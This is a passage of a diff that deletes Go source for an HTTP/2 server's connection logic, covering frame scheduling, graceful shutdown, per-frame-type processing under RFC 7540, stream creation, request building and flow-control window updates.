wr.stream.wroteHeaders { - // We do not need to notify wr.done because this frame is - // never written with wr.done != nil. - if wr.done != nil { - panic("wr.done != nil for write100ContinueHeadersFrame") - } - ignoreWrite = true - } - } - - if !ignoreWrite { - sc.writeSched.Push(wr) - } - sc.scheduleFrameWrite() -} - -// startFrameWrite starts a goroutine to write wr (in a separate -// goroutine since that might block on the network), and updates the -// serve goroutine's state about the world, updated from info in wr. -func (sc *serverConn) startFrameWrite(wr FrameWriteRequest) { - sc.serveG.check() - if sc.writingFrame { - panic("internal error: can only be writing one frame at a time") - } - - st := wr.stream - if st != nil { - switch st.state { - case stateHalfClosedLocal: - switch wr.write.(type) { - case StreamError, handlerPanicRST, writeWindowUpdate: - // RFC 7540 Section 5.1 allows sending RST_STREAM, PRIORITY, and WINDOW_UPDATE - // in this state. (We never send PRIORITY from the server, so that is not checked.) 
- default: - panic(fmt.Sprintf("internal error: attempt to send frame on a half-closed-local stream: %v", wr)) - } - case stateClosed: - panic(fmt.Sprintf("internal error: attempt to send frame on a closed stream: %v", wr)) - } - } - if wpp, ok := wr.write.(*writePushPromise); ok { - var err error - wpp.promisedID, err = wpp.allocatePromisedID() - if err != nil { - sc.writingFrameAsync = false - wr.replyToWriter(err) - return - } - } - - sc.writingFrame = true - sc.needsFrameFlush = true - if wr.write.staysWithinBuffer(sc.bw.Available()) { - sc.writingFrameAsync = false - err := wr.write.writeFrame(sc) - sc.wroteFrame(frameWriteResult{wr, err}) - } else { - sc.writingFrameAsync = true - go sc.writeFrameAsync(wr) - } -} - -// errHandlerPanicked is the error given to any callers blocked in a read from -// Request.Body when the main goroutine panics. Since most handlers read in the -// the main ServeHTTP goroutine, this will show up rarely. -var errHandlerPanicked = errors.New("http2: handler panicked") - -// wroteFrame is called on the serve goroutine with the result of -// whatever happened on writeFrameAsync. -func (sc *serverConn) wroteFrame(res frameWriteResult) { - sc.serveG.check() - if !sc.writingFrame { - panic("internal error: expected to be already writing a frame") - } - sc.writingFrame = false - sc.writingFrameAsync = false - - wr := res.wr - - if writeEndsStream(wr.write) { - st := wr.stream - if st == nil { - panic("internal error: expecting non-nil stream") - } - switch st.state { - case stateOpen: - // Here we would go to stateHalfClosedLocal in - // theory, but since our handler is done and - // the net/http package provides no mechanism - // for closing a ResponseWriter while still - // reading data (see possible TODO at top of - // this file), we go into closed state here - // anyway, after telling the peer we're - // hanging up on them. We'll transition to - // stateClosed after the RST_STREAM frame is - // written. - st.state = stateHalfClosedLocal - // Section 8.1: a server MAY request that the client abort - // transmission of a request without error by sending a - // RST_STREAM with an error code of NO_ERROR after sending - // a complete response. - sc.resetStream(streamError(st.id, ErrCodeNo)) - case stateHalfClosedRemote: - sc.closeStream(st, errHandlerComplete) - } - } else { - switch v := wr.write.(type) { - case StreamError: - // st may be unknown if the RST_STREAM was generated to reject bad input. - if st, ok := sc.streams[v.StreamID]; ok { - sc.closeStream(st, v) - } - case handlerPanicRST: - sc.closeStream(wr.stream, errHandlerPanicked) - } - } - - // Reply (if requested) to unblock the ServeHTTP goroutine. - wr.replyToWriter(res.err) - - sc.scheduleFrameWrite() -} - -// scheduleFrameWrite tickles the frame writing scheduler. -// -// If a frame is already being written, nothing happens. This will be called again -// when the frame is done being written. -// -// If a frame isn't being written we need to send one, the best frame -// to send is selected, preferring first things that aren't -// stream-specific (e.g. ACKing settings), and then finding the -// highest priority stream. -// -// If a frame isn't being written and there's nothing else to send, we -// flush the write buffer. 
-func (sc *serverConn) scheduleFrameWrite() { - sc.serveG.check() - if sc.writingFrame || sc.inFrameScheduleLoop { - return - } - sc.inFrameScheduleLoop = true - for !sc.writingFrameAsync { - if sc.needToSendGoAway { - sc.needToSendGoAway = false - sc.startFrameWrite(FrameWriteRequest{ - write: &writeGoAway{ - maxStreamID: sc.maxClientStreamID, - code: sc.goAwayCode, - }, - }) - continue - } - if sc.needToSendSettingsAck { - sc.needToSendSettingsAck = false - sc.startFrameWrite(FrameWriteRequest{write: writeSettingsAck{}}) - continue - } - if !sc.inGoAway || sc.goAwayCode == ErrCodeNo { - if wr, ok := sc.writeSched.Pop(); ok { - sc.startFrameWrite(wr) - continue - } - } - if sc.needsFrameFlush { - sc.startFrameWrite(FrameWriteRequest{write: flushFrameWriter{}}) - sc.needsFrameFlush = false // after startFrameWrite, since it sets this true - continue - } - break - } - sc.inFrameScheduleLoop = false -} - -// startGracefulShutdown gracefully shuts down a connection. This -// sends GOAWAY with ErrCodeNo to tell the client we're gracefully -// shutting down. The connection isn't closed until all current -// streams are done. -// -// startGracefulShutdown returns immediately; it does not wait until -// the connection has shut down. -func (sc *serverConn) startGracefulShutdown() { - sc.serveG.checkNotOn() // NOT - sc.shutdownOnce.Do(func() { sc.sendServeMsg(gracefulShutdownMsg) }) -} - -func (sc *serverConn) startGracefulShutdownInternal() { - sc.goAwayIn(ErrCodeNo, 0) -} - -func (sc *serverConn) goAway(code ErrCode) { - sc.serveG.check() - var forceCloseIn time.Duration - if code != ErrCodeNo { - forceCloseIn = 250 * time.Millisecond - } else { - // TODO: configurable - forceCloseIn = 1 * time.Second - } - sc.goAwayIn(code, forceCloseIn) -} - -func (sc *serverConn) goAwayIn(code ErrCode, forceCloseIn time.Duration) { - sc.serveG.check() - if sc.inGoAway { - return - } - if forceCloseIn != 0 { - sc.shutDownIn(forceCloseIn) - } - sc.inGoAway = true - sc.needToSendGoAway = true - sc.goAwayCode = code - sc.scheduleFrameWrite() -} - -func (sc *serverConn) shutDownIn(d time.Duration) { - sc.serveG.check() - sc.shutdownTimer = time.AfterFunc(d, sc.onShutdownTimer) -} - -func (sc *serverConn) resetStream(se StreamError) { - sc.serveG.check() - sc.writeFrame(FrameWriteRequest{write: se}) - if st, ok := sc.streams[se.StreamID]; ok { - st.resetQueued = true - } -} - -// processFrameFromReader processes the serve loop's read from readFrameCh from the -// frame-reading goroutine. -// processFrameFromReader returns whether the connection should be kept open. -func (sc *serverConn) processFrameFromReader(res readFrameResult) bool { - sc.serveG.check() - err := res.err - if err != nil { - if err == ErrFrameTooLarge { - sc.goAway(ErrCodeFrameSize) - return true // goAway will close the loop - } - clientGone := err == io.EOF || err == io.ErrUnexpectedEOF || isClosedConnError(err) - if clientGone { - // TODO: could we also get into this state if - // the peer does a half close - // (e.g. CloseWrite) because they're done - // sending frames but they're still wanting - // our open replies? Investigate. - // TODO: add CloseWrite to crypto/tls.Conn first - // so we have a way to test this? I suppose - // just for testing we could have a non-TLS mode. 
- return false - } - } else { - f := res.f - if VerboseLogs { - sc.vlogf("http2: server read frame %v", summarizeFrame(f)) - } - err = sc.processFrame(f) - if err == nil { - return true - } - } - - switch ev := err.(type) { - case StreamError: - sc.resetStream(ev) - return true - case goAwayFlowError: - sc.goAway(ErrCodeFlowControl) - return true - case ConnectionError: - sc.logf("http2: server connection error from %v: %v", sc.conn.RemoteAddr(), ev) - sc.goAway(ErrCode(ev)) - return true // goAway will handle shutdown - default: - if res.err != nil { - sc.vlogf("http2: server closing client connection; error reading frame from client %s: %v", sc.conn.RemoteAddr(), err) - } else { - sc.logf("http2: server closing client connection: %v", err) - } - return false - } -} - -func (sc *serverConn) processFrame(f Frame) error { - sc.serveG.check() - - // First frame received must be SETTINGS. - if !sc.sawFirstSettings { - if _, ok := f.(*SettingsFrame); !ok { - return ConnectionError(ErrCodeProtocol) - } - sc.sawFirstSettings = true - } - - switch f := f.(type) { - case *SettingsFrame: - return sc.processSettings(f) - case *MetaHeadersFrame: - return sc.processHeaders(f) - case *WindowUpdateFrame: - return sc.processWindowUpdate(f) - case *PingFrame: - return sc.processPing(f) - case *DataFrame: - return sc.processData(f) - case *RSTStreamFrame: - return sc.processResetStream(f) - case *PriorityFrame: - return sc.processPriority(f) - case *GoAwayFrame: - return sc.processGoAway(f) - case *PushPromiseFrame: - // A client cannot push. Thus, servers MUST treat the receipt of a PUSH_PROMISE - // frame as a connection error (Section 5.4.1) of type PROTOCOL_ERROR. - return ConnectionError(ErrCodeProtocol) - default: - sc.vlogf("http2: server ignoring frame: %v", f.Header()) - return nil - } -} - -func (sc *serverConn) processPing(f *PingFrame) error { - sc.serveG.check() - if f.IsAck() { - // 6.7 PING: " An endpoint MUST NOT respond to PING frames - // containing this flag." - return nil - } - if f.StreamID != 0 { - // "PING frames are not associated with any individual - // stream. If a PING frame is received with a stream - // identifier field value other than 0x0, the recipient MUST - // respond with a connection error (Section 5.4.1) of type - // PROTOCOL_ERROR." - return ConnectionError(ErrCodeProtocol) - } - if sc.inGoAway && sc.goAwayCode != ErrCodeNo { - return nil - } - sc.writeFrame(FrameWriteRequest{write: writePingAck{f}}) - return nil -} - -func (sc *serverConn) processWindowUpdate(f *WindowUpdateFrame) error { - sc.serveG.check() - switch { - case f.StreamID != 0: // stream-level flow control - state, st := sc.state(f.StreamID) - if state == stateIdle { - // Section 5.1: "Receiving any frame other than HEADERS - // or PRIORITY on a stream in this state MUST be - // treated as a connection error (Section 5.4.1) of - // type PROTOCOL_ERROR." - return ConnectionError(ErrCodeProtocol) - } - if st == nil { - // "WINDOW_UPDATE can be sent by a peer that has sent a - // frame bearing the END_STREAM flag. This means that a - // receiver could receive a WINDOW_UPDATE frame on a "half - // closed (remote)" or "closed" stream. A receiver MUST - // NOT treat this as an error, see Section 5.1." 
- return nil - } - if !st.flow.add(int32(f.Increment)) { - return streamError(f.StreamID, ErrCodeFlowControl) - } - default: // connection-level flow control - if !sc.flow.add(int32(f.Increment)) { - return goAwayFlowError{} - } - } - sc.scheduleFrameWrite() - return nil -} - -func (sc *serverConn) processResetStream(f *RSTStreamFrame) error { - sc.serveG.check() - - state, st := sc.state(f.StreamID) - if state == stateIdle { - // 6.4 "RST_STREAM frames MUST NOT be sent for a - // stream in the "idle" state. If a RST_STREAM frame - // identifying an idle stream is received, the - // recipient MUST treat this as a connection error - // (Section 5.4.1) of type PROTOCOL_ERROR. - return ConnectionError(ErrCodeProtocol) - } - if st != nil { - st.cancelCtx() - sc.closeStream(st, streamError(f.StreamID, f.ErrCode)) - } - return nil -} - -func (sc *serverConn) closeStream(st *stream, err error) { - sc.serveG.check() - if st.state == stateIdle || st.state == stateClosed { - panic(fmt.Sprintf("invariant; can't close stream in state %v", st.state)) - } - st.state = stateClosed - if st.writeDeadline != nil { - st.writeDeadline.Stop() - } - if st.isPushed() { - sc.curPushedStreams-- - } else { - sc.curClientStreams-- - } - delete(sc.streams, st.id) - if len(sc.streams) == 0 { - sc.setConnState(http.StateIdle) - if sc.srv.IdleTimeout != 0 { - sc.idleTimer.Reset(sc.srv.IdleTimeout) - } - if h1ServerKeepAlivesDisabled(sc.hs) { - sc.startGracefulShutdownInternal() - } - } - if p := st.body; p != nil { - // Return any buffered unread bytes worth of conn-level flow control. - // See golang.org/issue/16481 - sc.sendWindowUpdate(nil, p.Len()) - - p.CloseWithError(err) - } - st.cw.Close() // signals Handler's CloseNotifier, unblocks writes, etc - sc.writeSched.CloseStream(st.id) -} - -func (sc *serverConn) processSettings(f *SettingsFrame) error { - sc.serveG.check() - if f.IsAck() { - sc.unackedSettings-- - if sc.unackedSettings < 0 { - // Why is the peer ACKing settings we never sent? - // The spec doesn't mention this case, but - // hang up on them anyway. - return ConnectionError(ErrCodeProtocol) - } - return nil - } - if err := f.ForeachSetting(sc.processSetting); err != nil { - return err - } - sc.needToSendSettingsAck = true - sc.scheduleFrameWrite() - return nil -} - -func (sc *serverConn) processSetting(s Setting) error { - sc.serveG.check() - if err := s.Valid(); err != nil { - return err - } - if VerboseLogs { - sc.vlogf("http2: server processing setting %v", s) - } - switch s.ID { - case SettingHeaderTableSize: - sc.headerTableSize = s.Val - sc.hpackEncoder.SetMaxDynamicTableSize(s.Val) - case SettingEnablePush: - sc.pushEnabled = s.Val != 0 - case SettingMaxConcurrentStreams: - sc.clientMaxStreams = s.Val - case SettingInitialWindowSize: - return sc.processSettingInitialWindowSize(s.Val) - case SettingMaxFrameSize: - sc.maxFrameSize = int32(s.Val) // the maximum valid s.Val is < 2^31 - case SettingMaxHeaderListSize: - sc.peerMaxHeaderListSize = s.Val - default: - // Unknown setting: "An endpoint that receives a SETTINGS - // frame with any unknown or unsupported identifier MUST - // ignore that setting." - if VerboseLogs { - sc.vlogf("http2: server ignoring unknown setting %v", s) - } - } - return nil -} - -func (sc *serverConn) processSettingInitialWindowSize(val uint32) error { - sc.serveG.check() - // Note: val already validated to be within range by - // processSetting's Valid call. - - // "A SETTINGS frame can alter the initial flow control window - // size for all current streams. 
When the value of - // SETTINGS_INITIAL_WINDOW_SIZE changes, a receiver MUST - // adjust the size of all stream flow control windows that it - // maintains by the difference between the new value and the - // old value." - old := sc.initialStreamSendWindowSize - sc.initialStreamSendWindowSize = int32(val) - growth := int32(val) - old // may be negative - for _, st := range sc.streams { - if !st.flow.add(growth) { - // 6.9.2 Initial Flow Control Window Size - // "An endpoint MUST treat a change to - // SETTINGS_INITIAL_WINDOW_SIZE that causes any flow - // control window to exceed the maximum size as a - // connection error (Section 5.4.1) of type - // FLOW_CONTROL_ERROR." - return ConnectionError(ErrCodeFlowControl) - } - } - return nil -} - -func (sc *serverConn) processData(f *DataFrame) error { - sc.serveG.check() - if sc.inGoAway && sc.goAwayCode != ErrCodeNo { - return nil - } - data := f.Data() - - // "If a DATA frame is received whose stream is not in "open" - // or "half closed (local)" state, the recipient MUST respond - // with a stream error (Section 5.4.2) of type STREAM_CLOSED." - id := f.Header().StreamID - state, st := sc.state(id) - if id == 0 || state == stateIdle { - // Section 5.1: "Receiving any frame other than HEADERS - // or PRIORITY on a stream in this state MUST be - // treated as a connection error (Section 5.4.1) of - // type PROTOCOL_ERROR." - return ConnectionError(ErrCodeProtocol) - } - if st == nil || state != stateOpen || st.gotTrailerHeader || st.resetQueued { - // This includes sending a RST_STREAM if the stream is - // in stateHalfClosedLocal (which currently means that - // the http.Handler returned, so it's done reading & - // done writing). Try to stop the client from sending - // more DATA. - - // But still enforce their connection-level flow control, - // and return any flow control bytes since we're not going - // to consume them. - if sc.inflow.available() < int32(f.Length) { - return streamError(id, ErrCodeFlowControl) - } - // Deduct the flow control from inflow, since we're - // going to immediately add it back in - // sendWindowUpdate, which also schedules sending the - // frames. - sc.inflow.take(int32(f.Length)) - sc.sendWindowUpdate(nil, int(f.Length)) // conn-level - - if st != nil && st.resetQueued { - // Already have a stream error in flight. Don't send another. - return nil - } - return streamError(id, ErrCodeStreamClosed) - } - if st.body == nil { - panic("internal error: should have a body in this state") - } - - // Sender sending more than they'd declared? - if st.declBodyBytes != -1 && st.bodyBytes+int64(len(data)) > st.declBodyBytes { - st.body.CloseWithError(fmt.Errorf("sender tried to send more than declared Content-Length of %d bytes", st.declBodyBytes)) - return streamError(id, ErrCodeStreamClosed) - } - if f.Length > 0 { - // Check whether the client has flow control quota. - if st.inflow.available() < int32(f.Length) { - return streamError(id, ErrCodeFlowControl) - } - st.inflow.take(int32(f.Length)) - - if len(data) > 0 { - wrote, err := st.body.Write(data) - if err != nil { - return streamError(id, ErrCodeStreamClosed) - } - if wrote != len(data) { - panic("internal error: bad Writer") - } - st.bodyBytes += int64(len(data)) - } - - // Return any padded flow control now, since we won't - // refund it later on body reads. 
- if pad := int32(f.Length) - int32(len(data)); pad > 0 { - sc.sendWindowUpdate32(nil, pad) - sc.sendWindowUpdate32(st, pad) - } - } - if f.StreamEnded() { - st.endStream() - } - return nil -} - -func (sc *serverConn) processGoAway(f *GoAwayFrame) error { - sc.serveG.check() - if f.ErrCode != ErrCodeNo { - sc.logf("http2: received GOAWAY %+v, starting graceful shutdown", f) - } else { - sc.vlogf("http2: received GOAWAY %+v, starting graceful shutdown", f) - } - sc.startGracefulShutdownInternal() - // http://tools.ietf.org/html/rfc7540#section-6.8 - // We should not create any new streams, which means we should disable push. - sc.pushEnabled = false - return nil -} - -// isPushed reports whether the stream is server-initiated. -func (st *stream) isPushed() bool { - return st.id%2 == 0 -} - -// endStream closes a Request.Body's pipe. It is called when a DATA -// frame says a request body is over (or after trailers). -func (st *stream) endStream() { - sc := st.sc - sc.serveG.check() - - if st.declBodyBytes != -1 && st.declBodyBytes != st.bodyBytes { - st.body.CloseWithError(fmt.Errorf("request declared a Content-Length of %d but only wrote %d bytes", - st.declBodyBytes, st.bodyBytes)) - } else { - st.body.closeWithErrorAndCode(io.EOF, st.copyTrailersToHandlerRequest) - st.body.CloseWithError(io.EOF) - } - st.state = stateHalfClosedRemote -} - -// copyTrailersToHandlerRequest is run in the Handler's goroutine in -// its Request.Body.Read just before it gets io.EOF. -func (st *stream) copyTrailersToHandlerRequest() { - for k, vv := range st.trailer { - if _, ok := st.reqTrailer[k]; ok { - // Only copy it over it was pre-declared. - st.reqTrailer[k] = vv - } - } -} - -// onWriteTimeout is run on its own goroutine (from time.AfterFunc) -// when the stream's WriteTimeout has fired. -func (st *stream) onWriteTimeout() { - st.sc.writeFrameFromHandler(FrameWriteRequest{write: streamError(st.id, ErrCodeInternal)}) -} - -func (sc *serverConn) processHeaders(f *MetaHeadersFrame) error { - sc.serveG.check() - id := f.StreamID - if sc.inGoAway { - // Ignore. - return nil - } - // http://tools.ietf.org/html/rfc7540#section-5.1.1 - // Streams initiated by a client MUST use odd-numbered stream - // identifiers. [...] An endpoint that receives an unexpected - // stream identifier MUST respond with a connection error - // (Section 5.4.1) of type PROTOCOL_ERROR. - if id%2 != 1 { - return ConnectionError(ErrCodeProtocol) - } - // A HEADERS frame can be used to create a new stream or - // send a trailer for an open one. If we already have a stream - // open, let it process its own HEADERS frame (trailers at this - // point, if it's valid). - if st := sc.streams[f.StreamID]; st != nil { - if st.resetQueued { - // We're sending RST_STREAM to close the stream, so don't bother - // processing this frame. - return nil - } - return st.processTrailerHeaders(f) - } - - // [...] The identifier of a newly established stream MUST be - // numerically greater than all streams that the initiating - // endpoint has opened or reserved. [...] An endpoint that - // receives an unexpected stream identifier MUST respond with - // a connection error (Section 5.4.1) of type PROTOCOL_ERROR. - if id <= sc.maxClientStreamID { - return ConnectionError(ErrCodeProtocol) - } - sc.maxClientStreamID = id - - if sc.idleTimer != nil { - sc.idleTimer.Stop() - } - - // http://tools.ietf.org/html/rfc7540#section-5.1.2 - // [...] Endpoints MUST NOT exceed the limit set by their peer. 
An - // endpoint that receives a HEADERS frame that causes their - // advertised concurrent stream limit to be exceeded MUST treat - // this as a stream error (Section 5.4.2) of type PROTOCOL_ERROR - // or REFUSED_STREAM. - if sc.curClientStreams+1 > sc.advMaxStreams { - if sc.unackedSettings == 0 { - // They should know better. - return streamError(id, ErrCodeProtocol) - } - // Assume it's a network race, where they just haven't - // received our last SETTINGS update. But actually - // this can't happen yet, because we don't yet provide - // a way for users to adjust server parameters at - // runtime. - return streamError(id, ErrCodeRefusedStream) - } - - initialState := stateOpen - if f.StreamEnded() { - initialState = stateHalfClosedRemote - } - st := sc.newStream(id, 0, initialState) - - if f.HasPriority() { - if err := checkPriority(f.StreamID, f.Priority); err != nil { - return err - } - sc.writeSched.AdjustStream(st.id, f.Priority) - } - - rw, req, err := sc.newWriterAndRequest(st, f) - if err != nil { - return err - } - st.reqTrailer = req.Trailer - if st.reqTrailer != nil { - st.trailer = make(http.Header) - } - st.body = req.Body.(*requestBody).pipe // may be nil - st.declBodyBytes = req.ContentLength - - handler := sc.handler.ServeHTTP - if f.Truncated { - // Their header list was too long. Send a 431 error. - handler = handleHeaderListTooLong - } else if err := checkValidHTTP2RequestHeaders(req.Header); err != nil { - handler = new400Handler(err) - } - - // The net/http package sets the read deadline from the - // http.Server.ReadTimeout during the TLS handshake, but then - // passes the connection off to us with the deadline already - // set. Disarm it here after the request headers are read, - // similar to how the http1 server works. Here it's - // technically more like the http1 Server's ReadHeaderTimeout - // (in Go 1.8), though. That's a more sane option anyway. - if sc.hs.ReadTimeout != 0 { - sc.conn.SetReadDeadline(time.Time{}) - } - - go sc.runHandler(rw, req, handler) - return nil -} - -func (st *stream) processTrailerHeaders(f *MetaHeadersFrame) error { - sc := st.sc - sc.serveG.check() - if st.gotTrailerHeader { - return ConnectionError(ErrCodeProtocol) - } - st.gotTrailerHeader = true - if !f.StreamEnded() { - return streamError(st.id, ErrCodeProtocol) - } - - if len(f.PseudoFields()) > 0 { - return streamError(st.id, ErrCodeProtocol) - } - if st.trailer != nil { - for _, hf := range f.RegularFields() { - key := sc.canonicalHeader(hf.Name) - if !ValidTrailerHeader(key) { - // TODO: send more details to the peer somehow. But http2 has - // no way to send debug data at a stream level. Discuss with - // HTTP folk. - return streamError(st.id, ErrCodeProtocol) - } - st.trailer[key] = append(st.trailer[key], hf.Value) - } - } - st.endStream() - return nil -} - -func checkPriority(streamID uint32, p PriorityParam) error { - if streamID == p.StreamDep { - // Section 5.3.1: "A stream cannot depend on itself. An endpoint MUST treat - // this as a stream error (Section 5.4.2) of type PROTOCOL_ERROR." - // Section 5.3.3 says that a stream can depend on one of its dependencies, - // so it's only self-dependencies that are forbidden. 
- return streamError(streamID, ErrCodeProtocol) - } - return nil -} - -func (sc *serverConn) processPriority(f *PriorityFrame) error { - if sc.inGoAway { - return nil - } - if err := checkPriority(f.StreamID, f.PriorityParam); err != nil { - return err - } - sc.writeSched.AdjustStream(f.StreamID, f.PriorityParam) - return nil -} - -func (sc *serverConn) newStream(id, pusherID uint32, state streamState) *stream { - sc.serveG.check() - if id == 0 { - panic("internal error: cannot create stream with id 0") - } - - ctx, cancelCtx := contextWithCancel(sc.baseCtx) - st := &stream{ - sc: sc, - id: id, - state: state, - ctx: ctx, - cancelCtx: cancelCtx, - } - st.cw.Init() - st.flow.conn = &sc.flow // link to conn-level counter - st.flow.add(sc.initialStreamSendWindowSize) - st.inflow.conn = &sc.inflow // link to conn-level counter - st.inflow.add(sc.srv.initialStreamRecvWindowSize()) - if sc.hs.WriteTimeout != 0 { - st.writeDeadline = time.AfterFunc(sc.hs.WriteTimeout, st.onWriteTimeout) - } - - sc.streams[id] = st - sc.writeSched.OpenStream(st.id, OpenStreamOptions{PusherID: pusherID}) - if st.isPushed() { - sc.curPushedStreams++ - } else { - sc.curClientStreams++ - } - if sc.curOpenStreams() == 1 { - sc.setConnState(http.StateActive) - } - - return st -} - -func (sc *serverConn) newWriterAndRequest(st *stream, f *MetaHeadersFrame) (*responseWriter, *http.Request, error) { - sc.serveG.check() - - rp := requestParam{ - method: f.PseudoValue("method"), - scheme: f.PseudoValue("scheme"), - authority: f.PseudoValue("authority"), - path: f.PseudoValue("path"), - } - - isConnect := rp.method == "CONNECT" - if isConnect { - if rp.path != "" || rp.scheme != "" || rp.authority == "" { - return nil, nil, streamError(f.StreamID, ErrCodeProtocol) - } - } else if rp.method == "" || rp.path == "" || (rp.scheme != "https" && rp.scheme != "http") { - // See 8.1.2.6 Malformed Requests and Responses: - // - // Malformed requests or responses that are detected - // MUST be treated as a stream error (Section 5.4.2) - // of type PROTOCOL_ERROR." 
- // - // 8.1.2.3 Request Pseudo-Header Fields - // "All HTTP/2 requests MUST include exactly one valid - // value for the :method, :scheme, and :path - // pseudo-header fields" - return nil, nil, streamError(f.StreamID, ErrCodeProtocol) - } - - bodyOpen := !f.StreamEnded() - if rp.method == "HEAD" && bodyOpen { - // HEAD requests can't have bodies - return nil, nil, streamError(f.StreamID, ErrCodeProtocol) - } - - rp.header = make(http.Header) - for _, hf := range f.RegularFields() { - rp.header.Add(sc.canonicalHeader(hf.Name), hf.Value) - } - if rp.authority == "" { - rp.authority = rp.header.Get("Host") - } - - rw, req, err := sc.newWriterAndRequestNoBody(st, rp) - if err != nil { - return nil, nil, err - } - if bodyOpen { - if vv, ok := rp.header["Content-Length"]; ok { - req.ContentLength, _ = strconv.ParseInt(vv[0], 10, 64) - } else { - req.ContentLength = -1 - } - req.Body.(*requestBody).pipe = &pipe{ - b: &dataBuffer{expected: req.ContentLength}, - } - } - return rw, req, nil -} - -type requestParam struct { - method string - scheme, authority, path string - header http.Header -} - -func (sc *serverConn) newWriterAndRequestNoBody(st *stream, rp requestParam) (*responseWriter, *http.Request, error) { - sc.serveG.check() - - var tlsState *tls.ConnectionState // nil if not scheme https - if rp.scheme == "https" { - tlsState = sc.tlsState - } - - needsContinue := rp.header.Get("Expect") == "100-continue" - if needsContinue { - rp.header.Del("Expect") - } - // Merge Cookie headers into one "; "-delimited value. - if cookies := rp.header["Cookie"]; len(cookies) > 1 { - rp.header.Set("Cookie", strings.Join(cookies, "; ")) - } - - // Setup Trailers - var trailer http.Header - for _, v := range rp.header["Trailer"] { - for _, key := range strings.Split(v, ",") { - key = http.CanonicalHeaderKey(strings.TrimSpace(key)) - switch key { - case "Transfer-Encoding", "Trailer", "Content-Length": - // Bogus. (copy of http1 rules) - // Ignore. - default: - if trailer == nil { - trailer = make(http.Header) - } - trailer[key] = nil - } - } - } - delete(rp.header, "Trailer") - - var url_ *url.URL - var requestURI string - if rp.method == "CONNECT" { - url_ = &url.URL{Host: rp.authority} - requestURI = rp.authority // mimic HTTP/1 server behavior - } else { - var err error - url_, err = url.ParseRequestURI(rp.path) - if err != nil { - return nil, nil, streamError(st.id, ErrCodeProtocol) - } - requestURI = rp.path - } - - body := &requestBody{ - conn: sc, - stream: st, - needsContinue: needsContinue, - } - req := &http.Request{ - Method: rp.method, - URL: url_, - RemoteAddr: sc.remoteAddrStr, - Header: rp.header, - RequestURI: requestURI, - Proto: "HTTP/2.0", - ProtoMajor: 2, - ProtoMinor: 0, - TLS: tlsState, - Host: rp.authority, - Body: body, - Trailer: trailer, - } - req = requestWithContext(req, st.ctx) - - rws := responseWriterStatePool.Get().(*responseWriterState) - bwSave := rws.bw - *rws = responseWriterState{} // zero all the fields - rws.conn = sc - rws.bw = bwSave - rws.bw.Reset(chunkWriter{rws}) - rws.stream = st - rws.req = req - rws.body = body - - rw := &responseWriter{rws: rws} - return rw, req, nil -} - -// Run on its own goroutine. 
-func (sc *serverConn) runHandler(rw *responseWriter, req *http.Request, handler func(http.ResponseWriter, *http.Request)) { - didPanic := true - defer func() { - rw.rws.stream.cancelCtx() - if didPanic { - e := recover() - sc.writeFrameFromHandler(FrameWriteRequest{ - write: handlerPanicRST{rw.rws.stream.id}, - stream: rw.rws.stream, - }) - // Same as net/http: - if shouldLogPanic(e) { - const size = 64 << 10 - buf := make([]byte, size) - buf = buf[:runtime.Stack(buf, false)] - sc.logf("http2: panic serving %v: %v\n%s", sc.conn.RemoteAddr(), e, buf) - } - return - } - rw.handlerDone() - }() - handler(rw, req) - didPanic = false -} - -func handleHeaderListTooLong(w http.ResponseWriter, r *http.Request) { - // 10.5.1 Limits on Header Block Size: - // .. "A server that receives a larger header block than it is - // willing to handle can send an HTTP 431 (Request Header Fields Too - // Large) status code" - const statusRequestHeaderFieldsTooLarge = 431 // only in Go 1.6+ - w.WriteHeader(statusRequestHeaderFieldsTooLarge) - io.WriteString(w, "
<h1>HTTP Error 431</h1><p>Request Header Field(s) Too Large</p>
") -} - -// called from handler goroutines. -// h may be nil. -func (sc *serverConn) writeHeaders(st *stream, headerData *writeResHeaders) error { - sc.serveG.checkNotOn() // NOT on - var errc chan error - if headerData.h != nil { - // If there's a header map (which we don't own), so we have to block on - // waiting for this frame to be written, so an http.Flush mid-handler - // writes out the correct value of keys, before a handler later potentially - // mutates it. - errc = errChanPool.Get().(chan error) - } - if err := sc.writeFrameFromHandler(FrameWriteRequest{ - write: headerData, - stream: st, - done: errc, - }); err != nil { - return err - } - if errc != nil { - select { - case err := <-errc: - errChanPool.Put(errc) - return err - case <-sc.doneServing: - return errClientDisconnected - case <-st.cw: - return errStreamClosed - } - } - return nil -} - -// called from handler goroutines. -func (sc *serverConn) write100ContinueHeaders(st *stream) { - sc.writeFrameFromHandler(FrameWriteRequest{ - write: write100ContinueHeadersFrame{st.id}, - stream: st, - }) -} - -// A bodyReadMsg tells the server loop that the http.Handler read n -// bytes of the DATA from the client on the given stream. -type bodyReadMsg struct { - st *stream - n int -} - -// called from handler goroutines. -// Notes that the handler for the given stream ID read n bytes of its body -// and schedules flow control tokens to be sent. -func (sc *serverConn) noteBodyReadFromHandler(st *stream, n int, err error) { - sc.serveG.checkNotOn() // NOT on - if n > 0 { - select { - case sc.bodyReadCh <- bodyReadMsg{st, n}: - case <-sc.doneServing: - } - } -} - -func (sc *serverConn) noteBodyRead(st *stream, n int) { - sc.serveG.check() - sc.sendWindowUpdate(nil, n) // conn-level - if st.state != stateHalfClosedRemote && st.state != stateClosed { - // Don't send this WINDOW_UPDATE if the stream is closed - // remotely. - sc.sendWindowUpdate(st, n) - } -} - -// st may be nil for conn-level -func (sc *serverConn) sendWindowUpdate(st *stream, n int) { - sc.serveG.check() - // "The legal range for the increment to the flow control - // window is 1 to 2^31-1 (2,147,483,647) octets." - // A Go Read call on 64-bit machines could in theory read - // a larger Read than this. Very unlikely, but we handle it here - // rather than elsewhere for now. - const maxUint31 = 1<<31 - 1 - for n >= maxUint31 { - sc.sendWindowUpdate32(st, maxUint31) - n -= maxUint31 - } - sc.sendWindowUpdate32(st, int32(n)) -} - -// st may be nil for conn-level -func (sc *serverConn) sendWindowUpdate32(st *stream, n int32) { - sc.serveG.check() - if n == 0 { - return - } - if n < 0 { - panic("negative update") - } - var streamID uint32 - if st != nil { - streamID = st.id - } - sc.writeFrame(FrameWriteRequest{ - write: writeWindowUpdate{streamID: streamID, n: uint32(n)}, - stream: st, - }) - var ok bool - if st == nil { - ok = sc.inflow.add(n) - } else { - ok = st.inflow.add(n) - } - if !ok { - panic("internal error; sent too many window updates without decrements?") - } -} - -// requestBody is the Handler's Request.Body type. -// Read and Close may be called concurrently. 
